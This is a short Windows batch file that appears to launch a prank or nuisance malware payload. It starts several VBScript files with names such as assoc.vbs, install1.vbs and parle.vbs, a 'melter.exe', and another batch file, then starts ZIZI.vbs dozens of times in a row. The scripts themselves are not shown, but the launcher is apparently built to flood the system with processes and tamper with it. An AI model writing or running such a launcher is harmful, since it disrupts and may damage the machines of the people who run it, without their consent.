@echo off
start assoc.vbs
start parle.vbs
timeout /T 20 /NOBREAK
start music.vbs
start install1.vbs
start install2.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start melter.exe
start zizi2.bat
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs